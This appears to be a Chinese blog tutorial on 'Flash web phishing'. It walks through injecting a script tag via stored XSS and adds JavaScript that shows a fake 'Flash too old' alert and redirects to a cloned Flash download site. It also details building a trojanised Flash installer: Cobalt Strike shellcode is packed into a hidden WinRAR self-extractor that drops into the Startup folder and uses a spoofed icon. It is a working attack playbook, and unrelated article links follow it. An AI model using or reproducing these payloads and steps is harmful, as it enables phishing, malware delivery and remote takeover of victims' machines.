钓鱼攻击之:Flash 网页钓鱼

1 准备资料

  1. Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼
  2. 生成后门并捆绑flash的安装程序
  3. VPS服务器,并使用步骤1的资源,搭建好flash网站,下载地址要修改为构造好的后门文件。
  4. 有XSS漏洞的网站:GitHub - r00tSe7en/Flash-Pop: Flash钓鱼弹窗优化版

2 具体钓鱼流程

  1. 找到可以插入一段JS代码的网站,如:存在存储xss漏洞。插入触发flash版本过低弹窗的JS代码:

    <script src='http://192.168.10.3/version.js'></script>
  2. 目标点击确定后,跳转到伪造flash界面的VPS服务器,

  3. 目标靶机点击下载并安装,触发后门反弹shell

3 生成后门并捆绑flash的安装程序

  1. 通过CS生成C格式的shellcode,利用下面的网站生成后门程序

  2. 安装Winrar。

  3. 同时选中后门与Flash官方安装包,右键选择:添加到压缩文件。

  4. 选择:创建自解压格式压缩文件-->修改:压缩文件名(使其看起来更可信)

  5. 选择:高级-->自解压选项-->更新-->更新模式:解压并更新文件-->覆盖模式:覆盖所有文件

  6. 高级自解压选项窗口中选择:常规-->解压路径放到windows开机自启动目录

    C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup

  7. 高级自解压选项窗口中选择:设置-->解压后运行:r9VTngXsPg.exe-->解压前运行:flashplayerpp_install_cn.exe

  8. 高级自解压选项窗口中选择:模式-->全部隐藏

  9. 生成文件

  10. 为了增加可信度,修改生成后的文件图标

    1. 使用 ResourceHacker 导出flash官方文件的图标组

    2. 再用 ResourceHacker 将生成的自解压文件图标组修改成刚刚导出的flash图标组

    3. 另存为exe文件,再次确保命名为官网相同文件名

  11. 上传到VPS服务器中

4 处理WEB站点过程

  1. 模拟伪造Flash网站的VPS服务器:kali下

    1. 将下载的xss_flash目录中的文件全部移到/var/www/html

    2. 修改下载软件的地址为前面构造的后门软件

    3. 修改version.js中弹窗的指向伪造Flash网站地址

      window.alert = function(name){
      var iframe = document. createElement("IFRAME");
      iframe.style.display="none";
      iframe.setAttribute("src",'data:text/plain,');
      document. documentElement.appendChild(iframe);
      window.frames [0].window.alert(name);
      iframe.parentNode.removeChild(iframe);
      }
      alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
      window. location.href="http://192.168.10.3";
      • 此处伪造Flash网站地址为:http://192.168.10.3
    4. 启动apache2服务

  2. 模拟存在XSS网站的VPS服务器:index.html

    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Flash Test...</title>
    <script src='http://192.168.10.3/version.js'></script>
    </head>
    <body>
    <h1>Flash Test...</h1>
    </body>
    </html>
    • 模拟插入了<script src='http://192.168.10.3/version.js'></script>脚本
    • 此处存在XSS网站的VPS服务器地址为:http://192.168.10.3:81
  3. 目标靶机访问到这个存在XSS的页面就会执行代码

  4. 点确定后,跳转到伪造Flash网站

  5. 目标靶机点击下载并运行exe后,成功上线

最新文章

  1. Django~static files
  2. oracle 授权
  3. WPF中ComboBox用法
  4. DataContract
  5. Java用通配符 获得泛型的协变和逆变
  6. MYSQL router 自动均衡负载
  7. ValueError: Attempted relative import in non-package
  8. bzoj3940: [Usaco2015 Feb]Censoring
  9. 武汉科技大学ACM:1007: 文本编辑器
  10. 京JS 2013 - A two-day conference in Beijing for the JavaScript and Node.js community
  11. 如何解决android logcat不打印信息在android开发中
  12. spring jpa 自定义查询数据库的某个字段
  13. C#设计模式之四建造者模式(Builder Pattern)【创建型】
  14. hugepage优势
  15. StringBuffer的append方法比“+”高效
  16. python 全栈开发,Day8(文件操作)
  17. opencv 替换图像中的一部分
  18. 【转】Windows守护进程的一种简单实现
  19. Spring MVC 学习笔记9 —— 实现简单的用户管理(4)用户登录显示局部异常信息
  20. Android开发经典笔试面试题汇总(持续更新中)

热门文章

  1. vulnhub靶场之DIGITALWORLD.LOCAL: FALL
  2. 9V,12V输入充3.7V单节锂电池电路和芯片
  3. include指令和include动作的区别
  4. HMS Core 6.8.0版本发布公告
  5. week_2
  6. 通过GitHub和阿里云自定义域名实现https认证
  7. 为什么NoSQL数据库这么受欢迎?
  8. S2-015 CVE-2013-2135, CVE-2013-2134
  9. JavaScript 图像压缩
  10. 题解P1559 运动员最佳匹配问题